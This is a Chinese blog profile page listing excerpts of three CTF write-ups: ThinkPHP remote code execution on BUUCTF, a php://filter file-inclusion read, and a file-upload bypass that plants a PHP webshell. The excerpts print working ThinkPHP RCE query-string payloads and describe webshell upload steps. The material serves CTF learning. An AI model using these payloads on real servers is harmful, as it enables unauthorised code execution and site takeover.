- 博客(3)
- 收藏
- 关注
原创 【buu-ThinkPHP-rce】
【buu-ThinkPHP5-rce1】1.传参,查找flag即可s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1【buu-ThinkPHP2-rce】index.php/Index/index/name${@phpinfo()}【buu-ThinkPHP5.0.23-rce】1. 执行命令pocPOST /index
2021-11-15 23:46:54 2866
原创 【buu-BSideCF-2020-Had a bad day1】
1.打开看源码,啥也没得,参数后面加'就报错了,是一道文件包含2.读源码?category=php://filter/read=convert.base64-encode/resource=index.php报错了,后端自己加上了.php,所以我们删了?category=php://filter/read=convert.base64-encode/resource=index就可以得到base64编码后的源码了解码得到源码<?php$file = $
2021-11-15 23:43:34 2804
原创 【攻防世界-upload01】
1、查看源码得到,只是判断了后缀if(['jpg','png'].contains(ext)){ submit.disabled = false; }else{ submit.disabled = true; alert('请选择一张图片文件上传!');}}2、文本编辑一句话木马,改为.jpg或者.png后缀,再burp抓包改为.php就可3、访问上传的文件,可以访问到,用蚁剑连接,在根目录中找到flag.php...
2021-11-08 00:10:02 2439
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人